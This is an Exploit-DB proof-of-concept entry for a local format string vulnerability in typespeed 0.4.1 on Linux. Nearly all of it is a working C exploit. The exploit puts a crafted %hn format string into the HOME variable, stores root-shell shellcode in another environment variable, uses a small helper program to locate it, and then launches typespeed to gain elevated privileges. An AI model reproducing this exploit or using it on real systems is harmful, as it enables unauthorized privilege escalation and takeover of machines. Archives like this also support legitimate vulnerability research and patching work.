Typespeed 0.4.1 - Local Format String

EDB-ID:

25106




Platform:

Linux

Date:

2005-02-16


// source: https://www.securityfocus.com/bid/12569/info

typespeed is prone to a local format string vulnerability. Successful could allow privilege escalation. 

/*

Proof of Concept local exploit for typespeed tool

"enva" content:

*********************************************
#include <stdio.h>
#include <string.h>
  int main(int argc, char *argv[])
  {
  char *addr_ptr = NULL;
  addr_ptr = getenv(argv[1]);
  printf("%s @ %p\n", argv[1], addr_ptr);
  return 0;
  }
*********************************************

*/

#include <stdio.h>
#define offset 2
#define var (0x08050288+0x4)

char shellcode[] = 
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"
"\x31\xc0\xb0\x01\xcd\x80";

int main(int argc, char *argv[])
{
char *addr[3] = { ((char *)var +2),
		  ((char *)var),
		};

char buffer[1024];
int high, low;
long target;

target = 0xbffff950;

high = (target & 0xffff0000) >> 16;
low = (target & 0x0000ffff);

high -= 0x8;
sprintf(buffer, "%s%%.%dx%%%d$hn%%.%dx%%%d$hn", 
		&addr,
		high,
		offset,
		(low - high)-0x8,
		offset+1);
memset(buffer+strlen(buffer), 0x41, 32);

setenv("HOME", buffer, 1);
setenv("SHELLCODE", shellcode, 1);
system("./enva SHELLCODE");
system("./typespeed");
}